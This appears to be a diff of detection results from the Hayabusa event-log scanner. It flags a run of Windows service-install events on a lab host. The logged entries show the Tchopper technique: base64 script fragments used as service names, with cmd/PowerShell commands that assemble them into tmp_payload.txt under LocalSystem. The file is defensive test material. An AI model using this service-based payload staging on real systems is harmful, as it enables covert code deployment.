+2021-11-03 17:20:17.556 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGVjdGVkIGxpc3QgdHlwZQ0KDQojQHBhcmFtICRDb21wdXRlckxpc3RUeXBlICAgLT4gVGhlIHR5cGUgb2YgY29tcHV0ZXIgbGlzdCAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:19.033 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBHZXQtQ29tcHV0ZXJMaXN0IHsgcGFyYW0oJENvbXB1dGVyTGlzdFR5 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:20.486 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGUpDQoNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgJENvbXB1dGVyTGlzdCA9IEB7fTsNCg0KICAgICAgICBzd2l0Y2goJENvbXB1dGVyTGlzdFR5cGUpIHsNCg0KICAgICAgICAgICAgJERPTUFJTl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:22.080 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9PUFQgew0KICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaXN0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
